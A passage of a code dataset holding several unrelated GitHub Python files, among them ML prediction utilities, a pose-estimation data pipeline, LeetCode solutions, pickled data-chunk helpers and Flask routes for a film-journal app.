algorithm.startswith('Random'):\r\n model = load_model_pickle(filename='rf_model.pickle')\r\n\r\n elif algorithm.startswith('XGB'):\r\n # model = load_model_pickle(filename='xgb_model.pickle')\r\n model = Booster({'nthread': 2})\r\n model.load_model(f'{MODEL_PATH}/xgb_model.json')\r\n\r\n elif algorithm.startswith('ANN'):\r\n # loading keras-based ANN trained model\r\n model = load_model(f'{MODEL_PATH}/ann_model.h5')\r\n\r\n elif algorithm.startswith('All'):\r\n nb = load_model_pickle(filename='nb_model.pickle')\r\n svc = load_model_pickle(filename='svc_model.pickle')\r\n rf = load_model_pickle(filename='rf_model.pickle')\r\n\r\n xgb = Booster({'nthread': 2})\r\n 
xgb.load_model(f'{MODEL_PATH}/xgb_model.json')\r\n\r\n        nn = load_model(f'{MODEL_PATH}/ann_model.h5')\r\n        results = {\r\n            'nb': nb,\r\n            'svc': svc,\r\n            'rf': rf,\r\n            'xgb': xgb,\r\n            'nn': nn\r\n        }\r\n        return results\r\n\r\n    return model\r\n\r\n\r\n# loading scale data\r\ndef load_scale_data():\r\n    return pd.read_csv(f'{RESULTS_PATH}/scale_data_df.csv', index_col=0)\r\n\r\n# getting code for each model\r\n\r\n\r\ndef get_model_code(algorithm):\r\n    if algorithm.startswith('Naive'):\r\n        return 'nb'\r\n    elif algorithm.startswith('Support Vector'):\r\n        return 'svc'\r\n    elif algorithm.startswith('Random'):\r\n        return 'rf'\r\n    elif algorithm.startswith('XGB'):\r\n        return 'xgb'\r\n    elif algorithm.startswith('ANN'):\r\n        return 'nn'\r\n    else: # default\r\n        return 'rf'\r\n\r\n# getting model name from code\r\n\r\n\r\ndef get_model_name_from_code(code):\r\n    if code.startswith('nb'):\r\n        return \"Naive Bayes\"\r\n    elif code.startswith('rf'):\r\n        return \"Random Forest\"\r\n    elif code.startswith('svc'):\r\n        return \"Support Vector Classifier\"\r\n    elif code.startswith('nn'):\r\n        return \"Neural Networks\"\r\n    elif code.startswith('xgb'):\r\n        return \"XGBoost\"\r\n    else:\r\n        return ''\r\n\r\n# Make prediction\r\n\r\n\r\ndef make_prediction(model=None, recency=0, frequency=0, monetary=0.0, model_code='rf', col=None):\r\n    \"\"\"\r\n    Scales and preprocesses input datapoints and makes a prediction using 'model'\r\n\r\n    Args:\r\n        model: trained model to use. An instance of one of (RF, NB, SVC, ANN, XGB )\r\n        recency: Number of days ago since customer last patronized (days)\r\n        frequency: Number of times customer patronized (int)\r\n        monetary: Total money spent by customer across all transactions\r\n        model_code: code name for trained model type\r\n        Values:\r\n            'rf' for Random Forest | \r\n            'nb' for Naive Bayes | \r\n            'svc' for Support Vector Classifier | \r\n            'nn' for Neural Networks | \r\n            'xgb' for XGBoost |\r\n            'all' for all trained models\r\n\r\n    \"\"\"\r\n\r\n    # scaling the data collected\r\n    scale_data = load_scale_data()\r\n    scaled_recency = (\r\n        recency - scale_data.mini[0]) / (scale_data.maxi[0] - scale_data.mini[0])\r\n    scaled_frequency = (\r\n        frequency - scale_data.mini[1]) / (scale_data.maxi[1] - scale_data.mini[1])\r\n    scaled_monetary = (\r\n        monetary - scale_data.mini[2]) / (scale_data.maxi[2] - scale_data.mini[2])\r\n\r\n    temp = pd.DataFrame(np.array([\r\n        recency, frequency, monetary]).reshape(1, -1),\r\n        columns=['Recency', 'Frequency', 'Monetary'])\r\n\r\n    input_data = pd.DataFrame(np.array([\r\n        scaled_recency, scaled_frequency, scaled_monetary]).reshape(1, -1),\r\n        columns=['Recency', 'Frequency', 'Monetary'])\r\n\r\n    col.write('Raw Input Data:')\r\n    col.dataframe(temp)\r\n\r\n    col.write('Scaled Input Data:')\r\n    col.dataframe(input_data)\r\n    prediction = None\r\n\r\n    if model_code == 'all':\r\n        predictions = None\r\n        predictions = dict()\r\n\r\n        # loading trained models\r\n\r\n        results = get_trained_model(algorithm='All')\r\n\r\n        nb = results['nb']\r\n        svc = results['svc']\r\n        rf = results['rf']\r\n        xgb = results['xgb']\r\n        nn = results['nn']\r\n\r\n        # making predictions\r\n        predictions['nb_pred'] = nb.predict_proba(input_data)\r\n        predictions['rf_pred'] = rf.predict_proba(input_data)\r\n        predictions['svc_pred'] = svc.predict_proba(input_data)\r\n        # XGB\r\n        predictions['xgb_pred'] = xgb.predict(DMatrix(input_data))\r\n        # ANN\r\n        predictions['nn_pred'] = nn.predict(input_data)\r\n\r\n        return predictions\r\n\r\n    elif model_code == 'xgb':\r\n        prediction = 
model.predict(DMatrix(input_data))\r\n\r\n elif model_code == 'nn':\r\n prediction = model.predict(input_data)\r\n\r\n elif model_code in ['rf', 'svc', 'nb']:\r\n prediction = model.predict_proba(input_data)\r\n\r\n if prediction is None:\r\n st.error('Something went wrong. Sorry, Could not make prediction')\r\n\r\n return prediction\r\n","repo_name":"SimeonDee/customer-purchase-behaviour-analysis-and-prediction","sub_path":"Lola eCommerce Customer Purchase Behaviour/purchase_behaviour_prediction_app/InferenceApp/myutils.py","file_name":"myutils.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"31088304771","text":"import os\nimport cv2\nimport numpy as np\n\nfrom pycocotools.coco import maskUtils\n\nfrom tensorpack.dataflow.common import BatchData, MapData\nfrom tensorpack.dataflow.common import TestDataSpeed\nfrom tensorpack.dataflow.parallel import PrefetchDataZMQ\n\nfrom training.augmentors import ScaleAug, RotateAug, CropAug, FlipAug, \\\n joints_to_point8, point8_to_joints, AugImgMetadata\nfrom training.dataflow import CocoDataFlow, JointsLoader, COCODataPaths\nfrom training.label_maps import create_heatmap, create_paf\n\n\nALL_PAF_MASK = np.repeat(\n np.ones((46, 46, 1), dtype=np.uint8), 38, axis=2)\n\nALL_HEATMAP_MASK = np.repeat(\n np.ones((46, 46, 1), dtype=np.uint8), 19, axis=2)\n\nAUGMENTORS_LIST = [\n ScaleAug(scale_min=0.5,\n scale_max=1.1,\n target_dist=0.6,\n interp=cv2.INTER_CUBIC),\n\n RotateAug(rotate_max_deg=40,\n interp=cv2.INTER_CUBIC,\n border=cv2.BORDER_CONSTANT,\n border_value=(128, 128, 128), mask_border_val=1),\n\n CropAug(368, 368, center_perterb_max=40, border_value=(128, 128, 128),\n mask_border_val=1),\n\n FlipAug(num_parts=18, prob=0.5),\n ]\n\n\ndef read_img(components):\n \"\"\"\n Loads image from meta.img_path. 
Assigns the image to\n    the field img of the same meta instance.\n\n    :param components: components\n    :return: updated components\n    \"\"\"\n    meta = components[0]\n    img_buf = open(meta.img_path, 'rb').read()\n\n    if not img_buf:\n        raise Exception('image not read, path=%s' % meta.img_path)\n\n    arr = np.frombuffer(img_buf, np.uint8)\n    meta.img = cv2.imdecode(arr, cv2.IMREAD_COLOR)\n    meta.height, meta.width = meta.img.shape[:2]\n\n    return components\n\n\ndef gen_mask(components):\n    \"\"\"\n    Generate masks based on the coco mask polygons.\n\n    :param components: components\n    :return: updated components\n    \"\"\"\n    meta = components[0]\n    if meta.masks_segments:\n        mask_miss = np.ones((meta.height, meta.width), dtype=np.uint8)\n        for seg in meta.masks_segments:\n            bin_mask = maskUtils.decode(seg)\n            bin_mask = np.logical_not(bin_mask)\n            mask_miss = np.bitwise_and(mask_miss, bin_mask)\n\n        meta.mask = mask_miss\n\n    return components\n\n\ndef augment(components):\n    \"\"\"\n    Augmenting of images.\n\n    :param components: components\n    :return: updated components.\n    \"\"\"\n    meta = components[0]\n\n    aug_center = meta.center.copy()\n    aug_joints = joints_to_point8(meta.all_joints)\n\n    for aug in AUGMENTORS_LIST:\n        (im, mask), params = aug.augment_return_params(\n            AugImgMetadata(img=meta.img,\n                           mask=meta.mask,\n                           center=aug_center,\n                           scale=meta.scale))\n\n        # augment joints\n        aug_joints = aug.augment_coords(aug_joints, params)\n\n        # after flipping horizontally the left side joints and right side joints are also\n        # flipped so we need to recover their original orientation.\n        if isinstance(aug, FlipAug):\n            aug_joints = aug.recover_left_right(aug_joints, params)\n\n        # augment center position\n        aug_center = aug.augment_coords(aug_center, params)\n\n        meta.img = im\n        meta.mask = mask\n\n    meta.aug_joints = point8_to_joints(aug_joints)\n    meta.aug_center = aug_center\n\n    return components\n\n\ndef apply_mask(components):\n    \"\"\"\n    Applies the mask (if exists) to the image.\n\n    :param components: components\n    :return: updated components\n    \"\"\"\n    meta = components[0]\n    if meta.mask is not None:\n        meta.img[:, :, 0] = meta.img[:, :, 0] * meta.mask\n        meta.img[:, :, 1] = meta.img[:, :, 1] * meta.mask\n        meta.img[:, :, 2] = meta.img[:, :, 2] * meta.mask\n    return components\n\n\ndef create_all_mask(mask, num, stride):\n    \"\"\"\n    Helper function to create a stack of scaled down mask.\n\n    :param mask: mask image\n    :param num: number of layers\n    :param stride: parameter used to scale down the mask image because it has\n    the same size as original image. We need the size of network output.\n    :return:\n    \"\"\"\n    scale_factor = 1.0 / stride\n    small_mask = cv2.resize(mask, (0, 0), fx=scale_factor, fy=scale_factor, interpolation=cv2.INTER_CUBIC)\n    small_mask = small_mask[:, :, np.newaxis]\n    return np.repeat(small_mask, num, axis=2)\n\n\ndef build_sample(components):\n    \"\"\"\n    Builds a sample for a model.\n\n    :param components: components\n    :return: list of final components of a sample.\n    \"\"\"\n    meta = components[0]\n    image = meta.img\n\n    if meta.mask is None:\n        mask_paf = ALL_PAF_MASK\n        mask_heatmap = ALL_HEATMAP_MASK\n    else:\n        mask_paf = create_all_mask(meta.mask, 38, stride=8)\n        mask_heatmap = create_all_mask(meta.mask, 19, stride=8)\n\n    heatmap = create_heatmap(JointsLoader.num_joints_and_bkg, 46, 46,\n                             meta.aug_joints, 7.0, stride=8)\n\n    pafmap = create_paf(JointsLoader.num_connections, 46, 46,\n                        meta.aug_joints, 1, stride=8)\n\n    # release reference to the image/mask/augmented data. 
Otherwise it would easily consume all memory at some point\n    meta.mask = None\n    meta.img = None\n    meta.aug_joints = None\n    meta.aug_center = None\n    return [image.astype(np.uint8), mask_paf, mask_heatmap, pafmap, heatmap]\n\n\ndef get_dataflow(coco_data_paths):\n    \"\"\"\n    This function initializes the tensorpack dataflow and serves generator\n    for training operation.\n\n    :param coco_data_paths: paths to the coco files: annotation file and folder with images\n    :return: dataflow object\n    \"\"\"\n    df = CocoDataFlow((368, 368), coco_data_paths)\n    df.prepare()\n    df = MapData(df, read_img)\n    df = MapData(df, gen_mask)\n    df = MapData(df, augment)\n    df = MapData(df, apply_mask)\n    df = MapData(df, build_sample)\n    df = PrefetchDataZMQ(df, nr_proc=4) #df = PrefetchData(df, 2, 1)\n\n    return df\n\n\ndef batch_dataflow(df, batch_size):\n    \"\"\"\n    The function builds batch dataflow from the input dataflow of samples\n\n    :param df: dataflow of samples\n    :param batch_size: batch size\n    :return: dataflow of batches\n    \"\"\"\n    df = BatchData(df, batch_size, use_list=False)\n    df = MapData(df, lambda x: (\n        [x[0], x[1], x[2]],\n        [x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4]])\n    )\n    df.reset_state()\n    return df\n\n\nif __name__ == '__main__':\n    \"\"\"\n    Run this script to check speed of generating samples. Tweak the nr_proc\n    parameter of PrefetchDataZMQ. Ideally it should reflect the number of cores \n    in your hardware\n    \"\"\"\n    batch_size = 10\n    curr_dir = os.path.dirname(__file__)\n    annot_path = os.path.join(curr_dir, '../dataset/annotations/person_keypoints_val2017.json')\n    img_dir = os.path.abspath(os.path.join(curr_dir, '../dataset/val2017/'))\n    df = CocoDataFlow((368, 368), COCODataPaths(annot_path, img_dir))#, select_ids=[1000])\n    df.prepare()\n    df = MapData(df, read_img)\n    df = MapData(df, gen_mask)\n    df = MapData(df, augment)\n    df = MapData(df, apply_mask)\n    df = MapData(df, build_sample)\n    df = PrefetchDataZMQ(df, nr_proc=4)\n    df = BatchData(df, batch_size, use_list=False)\n    df = MapData(df, lambda x: (\n        [x[0], x[1], x[2]],\n        [x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4], x[3], x[4]])\n    )\n\n    TestDataSpeed(df, size=100).start()\n","repo_name":"michalfaber/keras_Realtime_Multi-Person_Pose_Estimation","sub_path":"training/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7431,"program_lang":"python","lang":"en","doc_type":"code","stars":780,"dataset":"github-code","pt":"65"}
{"seq_id":"19215747599","text":"#\n# @lc app=leetcode id=129 lang=python3\n#\n# [129] Sum Root to Leaf Numbers\n#\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution:\n    def sumNumbers(self, root: TreeNode) -> int:\n        self.sum = 0\n        self.solver(root, 0)\n        return self.sum\n    \n    def solver(self, root, path):\n        if not root:\n            return\n        path = path * 10 + root.val\n        if not root.left and not root.right:\n            self.sum += path\n            return\n        self.solver(root.left, path)\n        self.solver(root.right, path)\n# ✔ Accepted\n# ✔ 110/110 cases passed (28 ms)\n# ✔ Your runtime beats 99.68 % of python3 submissions\n# ✔ Your memory usage beats 5.55 % of python3 submissions (13.9 MB)\n# if __name__ == \"__main__\":\n#     root = TreeNode(1)\n#     root.left = TreeNode(2)\n#     root.right = TreeNode(3)\n\n\n    # res = 
Solution().sumNumbers(root)\n","repo_name":"DizzyYunxuan/Leetcode_answers","sub_path":"129.sum-root-to-leaf-numbers.py","file_name":"129.sum-root-to-leaf-numbers.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"}
{"seq_id":"13532270015","text":"import pandas as pd\nimport numpy as np\nimport pickle as pkl\n\n#from tqdm.notebook import tqdm\nfrom tqdm import tqdm\n\nfrom utilities.utility import create_dummy_image\nfrom utilities.utility import dummy_crop_image\nfrom utilities.utility import fetch_all_samples_hdf5\n\nfrom utilities.sequencer_utils import time_in_seconds\nfrom utilities.sequencer_utils import convert_to_epoch\nfrom utilities.utility import generate_file_name\nfrom utilities.utility import standardize_img\n# To set to 0 later\nDEBUG = 1\n\n# Root directory\nROOT_DIR = '.'\n\n# Max size to write on memory\nBLOCK_MAX_SIZE = 20000\n\n\"\"\"\nGroups the dataframe by a column and sorts each group with respect to timestamps\nArgs:\n    df: dataframe to group\n    column: column to group by\nReturns:\n    Grouped dataframe, sorted by index within each group\n\"\"\"\ndef group_by(df, column):\n    try:\n        grouped = df.groupby(column, as_index=False, sort=False).apply(lambda x: x.sort_index(ascending=True))\n    except KeyError:\n        return None\n    return grouped\n\n\"\"\"\nGenerates the intermediate dictionaries that will be used to produce data chunks for the model\nArgs:\n    args: Object containing arguments\n    df: original dataframe \n    list_stations: list of stations\nReturns:\n    dictionary mapping each station to its list of training rows\n\"\"\"\ndef generate_stations_dictionaries(args, df, list_stations):\n    # First step: organize the dataframe with respect to file paths\n    grouped = group_by(df, 'hdf5_8bit_path')\n    unique_paths = np.unique(df['hdf5_8bit_path'])\n\n    # timer\n    t1 = tqdm(total=len(unique_paths))\n    nb_rows = 0\n    records = {}\n    # Creating dictionaries\n    for s in list_stations:\n        records[s] = []\n\n    # Main loop\n    for path in unique_paths:\n        # Grouping by paths\n        cropped_df = grouped[grouped.hdf5_8bit_path == path].sort_index(axis=0)\n        offsets = cropped_df['hdf5_8bit_offset'].values\n        # Collecting cropped images from the compressed data\n        #dic = dummy_crop_image(path)\n        dic = fetch_all_samples_hdf5(args, path)\n\n        # Iterating through stations\n        for index, row in cropped_df.iterrows():\n            img = None\n            station_id = row['station']\n            offset = row['hdf5_8bit_offset']\n            try:\n                img = standardize_img(dic[station_id][offset])\n            except KeyError:\n                img = create_dummy_image()\n\n            # Generating row and adding it to the list\n            df_timestamp = row['iso-datetime']\n            new_row = {'iso-datetime': convert_to_epoch(df_timestamp),\n                       'station': row['station'],\n                       'day': df_timestamp.day,\n                       'month': df_timestamp.month,\n                       #'hour': df_timestamp.hour,\n                       #'local_time': time_in_seconds(df_timestamp),\n                       'image': img,\n                       'CLEARSKY_GHI': row['CLEARSKY_GHI'],\n                       'GHI': row['GHI']}\n            records[station_id].append(new_row)\n            nb_rows += 1\n        \n        t1.update(1)\n    print('Generated %d rows in total' % nb_rows)\n    return records\n\n\n\n\ndef dump_station_data(station_name, records, root_dir, seq_dic, db):\n    print('Dumping data for station %s...' 
% station_name)\n seq_dic[station_name] += 1\n filename = generate_file_name()\n filepath = root_dir + '/' + filename + '.dat'\n new_row = {'station': station_name,'seq': seq_dic[station_name], 'df_path':filepath}\n db.append(new_row)\n # Dumping data on disk\n pkl.dump(records, open(filepath, \"wb\" ))\n\n\n\"\"\"\nGenerates the intermediate data chunks for the model\nArgs:\n args: Object containing arguments\n df: original dataframe \n list_stations: list of stations\nReturns:\n Joint table to retrieve the blocks\n\"\"\"\ndef generate_memory_blocks(args, df, list_stations, root_dir = ROOT_DIR + '/output/', db_path = 'database.db'):\n # Dataframe containing blocks info to access them\n db_list = []\n seq_dic = {}\n\n # First step: organize the dataframe with respect to file paths\n grouped = group_by(df, 'hdf5_8bit_path')\n unique_paths = np.unique(df['hdf5_8bit_path'])\n\n # timer\n t1 = tqdm(total=len(unique_paths))\n nb_rows = 0\n records = {}\n \n # Creating dictionaries\n for s in list_stations:\n records[s] = []\n seq_dic[s] = 0\n\n # Main loop\n for path in unique_paths:\n # Grouping by paths\n cropped_df = grouped[grouped.hdf5_8bit_path == path].sort_index(axis=0)\n # Collecting cropped images from the compressed data\n #dic = dummy_crop_image(path)\n dic = fetch_all_samples_hdf5(args, path)\n\n # Iterating through stations\n for index, row in cropped_df.iterrows():\n img = None\n station_id = row['station']\n offset = row['hdf5_8bit_offset']\n try:\n #img = standardize_img(dic[station_id][offset])\n img = dic[station_id][offset]\n except KeyError:\n img = create_dummy_image()\n\n # Generating row and adding it to the list\n df_timestamp = row['iso-datetime']\n new_row = {'iso-datetime': convert_to_epoch(df_timestamp),\n 'station': row['station'],\n 'day': df_timestamp.day,\n 'month': df_timestamp.month,\n 'hour': df_timestamp.hour,\n 'local_time': time_in_seconds(df_timestamp),\n 'image': img,\n 'CLEARSKY_GHI': row['CLEARSKY_GHI'],\n 'GHI': row['GHI']}\n records[station_id].append(new_row)\n nb_rows += 1\n \n # Check if we reached max size\n for s in list_stations:\n if len(records[s]) >= BLOCK_MAX_SIZE:\n # Writing data on memory\n dump_station_data(s, records[s], root_dir, seq_dic, db_list)\n # Flushing out memory\n records[s] = []\n # Tqdm counter\n t1.update(1)\n \n # Last pass to write whatever is left\n for s in list_stations:\n if len(records[s]) > 0:\n # Writing data on memory\n dump_station_data(s, records[s], root_dir, seq_dic, db_list)\n records[s] = []\n print('Generated %d rows in total' % nb_rows)\n print('Saving the joint table...')\n db_df = pd.DataFrame(db_list)\n db_df.to_pickle(db_path)\n return db_df\n\n\n\"\"\"\nGets list of indexes given a size and a slice offset\nArgs:\n total_size: size to split\n slice: size of each chunk\nReturns:\n list of indexes corresponding to the splits\n\"\"\"\ndef get_n_slices(total_size, slice):\n indexes = []\n nb_slices = int(total_size / slice)\n for idx in range(nb_slices + 1):\n indexes.append(idx * slice)\n return indexes\n\n\n\"\"\"\nGenerates sub-lists from the main lists\nArgs:\n records: list of data\n slice_size: maximum size allowed\nReturns:\n List of sub-blocks\n\"\"\"\ndef generate_blocks_from_lists(records, slice_size):\n mini_blocks = []\n slices = get_n_slices(len(records), slice_size)\n nb_slices = len(slices)\n last = len(records) - 1\n for index in reversed(slices):\n mini_blocks.insert(0, records[index:last])\n last = index\n return mini_blocks\n\n\n\"\"\"\nSaves blocks in the disk\nArgs:\n records: list of 
data\n    list_stations: list of stations\n    root_dir: folder\n    slice_size: maximum size allowed\nReturns:\n    Dataframe with records pointing to the files locations\n\"\"\"\ndef write_blocks_on_disk(records, list_stations, root_dir = ROOT_DIR + '/data/preprocessed/', slice_size = 30000, df_path = 'database.db' ):\n    db_list = []\n    t1 = tqdm(total=len(list_stations))\n    for s in list_stations:\n        # Getting records\n        records_list = records[s]\n        # Slicing\n        mini_blocks = generate_blocks_from_lists(records_list, slice_size)\n        i = 0\n        for b in mini_blocks:\n            i = i + 1\n            filename = generate_file_name()\n            filepath = root_dir + filename + '.dat'\n            new_row = {'station': s,\n                       'seq':i,\n                       'df_path':filepath}\n            db_list.append(new_row)\n            # Dumping data on disk\n            pkl.dump(b, open(filepath, \"wb\" ) )\n        t1.update(1)\n    db = pd.DataFrame(db_list)\n    db.to_pickle(df_path)\n    return db\n\n\n\n\n\"\"\"\nReads data-frame information from database\nArgs:\n    db_df: dataframe with block records\nReturns:\n    Dictionary-representation of the dataframe\n\"\"\"\ndef read_db(db_df):\n    stations_mapping = {}\n    # First step: organize the dataframe with respect to stations\n    grouped = group_by(db_df, 'station')\n    unique_stations = np.unique(db_df['station'])\n\n    # Iterating through stations\n    for station in unique_stations:\n        stations_mapping[station] = {}\n        cropped_df = grouped[grouped.station == station]\n        sequences = sorted(cropped_df['seq'].values)\n        for seq in sequences:\n            row = cropped_df.query(f'station == \"{station}\" and seq=={seq}', inplace=False)\n            stations_mapping[station][seq] = row['df_path'].values[0]\n    return stations_mapping\n","repo_name":"raghavgupta0296/IFT-6759-Team-13","sub_path":"utilities/intermediate_code/dataframe_utils.py","file_name":"dataframe_utils.py","file_ext":"py","file_size_in_byte":9139,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"}
{"seq_id":"17553155509","text":"from readers import read_controls\nfrom os.path import join\n\nasr_root = \"/home/samf/museum_speech\"\ncontrols = read_controls(join(asr_root, \"24_03_2016/controls\"))\n\ncontrol_list = sorted(controls.keys())\n\nfor i in range(0, len(control_list)):\n\tbase = control_list[i]\n\tcontrol_init, read_back = controls[base]\n\tprint(base,control_init)\n\tfor key in read_back:\n\t\ttime, num = read_back[key]\n\t\tprint(key, time, num)\n","repo_name":"samuelfernando/spodiro-asr","sub_path":"post_proc/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"23162483319","text":"#!/bin/env python3\n\n\"\"\"\nClass representing a cell.\nEach cell is linked to its grid\nIt can be either dead or alive\n\"\"\"\nclass Cell:\n\n    def __init__(self, ipos, jpos, grid, state=0):\n        \"\"\"\n        Constructor for class cell\n        \"\"\"\n        # Cell position\n        self.ipos = ipos\n        self.jpos = jpos\n\n        # Cell state\n        self.state = bool(state)\n\n        # Grid to which the cell belongs\n        self.grid = grid\n\n    def live(self):\n        \"\"\"\n        Make the cell \"live\" / \"born\" (set its state to True)\n        \"\"\"\n        if not self.state:\n            self.grid.alive_cell_counter += 1\n        self.state = True\n\n    def die(self):\n        \"\"\"\n        Make the cell \"die\" (set its state to False)\n        \"\"\"\n        if self.state:\n            self.grid.alive_cell_counter -= 1\n        self.state = False\n\n\n    def count_alive_neighbors(self):\n        \"\"\"\n        **return:**\n            * The number of alive neighbors of the cell.\n        \"\"\"\n        n_alive_neighbors = 0\n        for neighbor in self.grid.neighbors(self):\n            if 
neighbor.state:\n                n_alive_neighbors += 1\n\n        return n_alive_neighbors\n","repo_name":"GaetanLepage/pyEvolve","sub_path":"src/entities/cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"27238616257","text":"\"\"\"\nGiven an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.\n\nYou may assume that the array is non-empty and the majority element always exist in the array.\n\nExample 1:\n\nInput: [3,2,3]\nOutput: 3\nExample 2:\n\nInput: [2,2,1,1,1,2,2]\nOutput: 2\n\"\"\"\n# 192ms. 82 percentile.\n# question guarantees an answer, so we don't need the check part of boyer moore that is commented out. \nclass Solution:\n    def majorityElement(self, nums: List[int]) -> int:\n        # Boyer Moore\n        count = 0\n        candidate = \"\"\n        for num in nums:\n            if count == 0:\n                candidate = num\n            if num == candidate:\n                count += 1\n            else:\n                count -= 1\n        \n        # check = 0\n        # for num in nums:\n        #     if num == candidate:\n        #         check += 1\n        \n        # return candidate if check >= 1 + len(nums)//2 else \"\"\n        \n        return candidate\n\n\n\n\"\"\"\nNotes:\nSee notes on Boyer Moore\n\"\"\"","repo_name":"JackMGrundy/coding-challenges","sub_path":"common-problems-leetcode/easy/majority-element.py","file_name":"majority-element.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"}
{"seq_id":"769624195","text":"from flask import Blueprint, request, render_template, redirect, url_for, flash\nfrom flask_login import login_user, logout_user, login_required, current_user\nfrom datetime import date, datetime\nfrom film_app.models import Film, List, Entry, User\nfrom film_app.main.forms import FilmForm, ListForm, EntryForm\nfrom film_app.extensions import app, db, bcrypt\n\nmain = Blueprint(\"main\", __name__)\n\n@main.route('/')\ndef homepage():\n    all_films = Film.query.all()\n    all_users = User.query.all()\n    return render_template('home.html',\n        all_films=all_films, all_users=all_users)\n\n@main.route('/create_film', methods=['GET', 'POST'])\n@login_required\ndef create_film():\n    form = FilmForm()\n\n    if form.validate_on_submit(): \n        new_film = Film(\n            title=form.title.data,\n            watched_date=form.watched_date.data,\n            list=form.list.data,\n            genre=form.genre.data,\n            entries=form.entries.data\n        )\n        db.session.add(new_film)\n        db.session.commit()\n\n        flash('New film was created successfully.')\n        return redirect(url_for('main.film_detail', film_id=new_film.id))\n    return render_template('create_film.html', form=form)\n\n@main.route('/create_list', methods=['GET', 'POST'])\n@login_required\ndef create_list():\n    form = ListForm()\n    if form.validate_on_submit():\n        new_list = List(\n            name=form.name.data,\n            description=form.description.data\n        )\n        db.session.add(new_list)\n        db.session.commit()\n\n        flash('New list created successfully.')\n        return redirect(url_for('main.homepage'))\n    \n    return render_template('create_list.html', form=form)\n\n@main.route('/create_entry', methods=['GET', 'POST'])\n@login_required\ndef create_entry():\n    form = EntryForm()\n    if form.validate_on_submit():\n        new_entry = Entry(\n            name=form.name.data\n        )\n        db.session.add(new_entry)\n        db.session.commit()\n\n        flash('New entry created successfully.')\n        return redirect(url_for('main.homepage'))\n    \n    return render_template('create_entry.html', form=form)\n\n@main.route('/film/<film_id>', methods=['GET', 'POST'])\ndef 
film_detail(film_id):\n    film = Film.query.get(film_id)\n    form = FilmForm(obj=film)\n    \n    if form.validate_on_submit():\n        film.title = form.title.data\n        film.watched_date = form.watched_date.data\n        film.list = form.list.data\n        film.genre = form.genre.data\n        film.entries = form.entries.data\n\n        db.session.commit()\n\n        flash('Film was updated successfully.')\n        return redirect(url_for('main.film_detail', film_id=film_id))\n\n    return render_template('film_detail.html', film=film, form=form)\n\n@main.route('/profile/<username>')\ndef profile(username):\n    user = User.query.filter_by(username=username).one()\n    return render_template('profile.html', user=user)\n\n@main.route('/favorite/<film_id>', methods=['POST'])\n@login_required\ndef favorite_film(film_id):\n    film = Film.query.get(film_id)\n    if film in current_user.favorite_films:\n        flash('Film already in favorites.')\n    else:\n        current_user.favorite_films.append(film)\n        db.session.add(current_user)\n        db.session.commit()\n        flash('Film added to favorites.')\n    return redirect(url_for('main.film_detail', film_id=film_id))\n\n@main.route('/unfavorite/<film_id>', methods=['POST'])\n@login_required\ndef unfavorite_film(film_id):\n    film = Film.query.get(film_id)\n    if film not in current_user.favorite_films:\n        flash('Film not in favorites.')\n    else:\n        current_user.favorite_films.remove(film)\n        db.session.add(current_user)\n        db.session.commit()\n        flash('Film removed from favorites.')\n    return redirect(url_for('main.film_detail', film_id=film_id))\n\n@main.route('/watchlist/<film_id>', methods=['POST'])\n@login_required\ndef watch_film(film_id):\n    film = Film.query.get(film_id)\n    if film in current_user.watchlist_films:\n        flash('Film already in watchlist.')\n    else:\n        current_user.watchlist_films.append(film)\n        db.session.add(current_user)\n        db.session.commit()\n        flash('Film added to watchlist.')\n    return redirect(url_for('main.film_detail', film_id=film_id))\n\n@main.route('/unwatchlist/<film_id>', methods=['POST'])\n@login_required\ndef unwatchlist_film(film_id):\n    film = Film.query.get(film_id)\n    if film not in current_user.watchlist_films:\n        flash('Film not in watchlist.')\n    else:\n        current_user.watchlist_films.remove(film)\n        db.session.add(current_user)\n        db.session.commit()\n        flash('Film removed from watchlist.')\n    return redirect(url_for('main.film_detail', film_id=film_id))","repo_name":"sharmaineb/film-journal","sub_path":"film_app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"40079336562","text":"import os\nimport enchant\nimport dataset.dataset_reader as dr\nfrom features.feature import Feature\nfrom features.feature_storage import FeatureWithStorage\nfrom Levenshtein.StringMatcher import StringMatcher\n\n# Levenshtein word distance ratio threshold\nWORD_DIST_RATIO = 0.6\nBRANDS_FILE = './additional/brands.txt'\n\n\nclass OutOfDictWordsFeature(Feature):\n    def __init__(self):\n        self.brands = None\n        self.dir = os.path.dirname(__file__)\n        # dictionary with English words\n        self.d = enchant.Dict(\"en_US\")\n        # dictionary with Spanish words (because they may occur in English tweets)\n        self.d_sp = enchant.Dict(\"es\")\n        # Tool for calculating Levenshtein word distance\n        self.sm = StringMatcher()\n        # load brands\n        self.brands = set(line.lower().strip() for line in open(os.path.join(self.dir, BRANDS_FILE)))\n\n    def extract_feature(self, user_id, tweets):\n        # List with out of dictionary words\n        out_of_dict_words = set()\n        # List with words in dictionary\n        
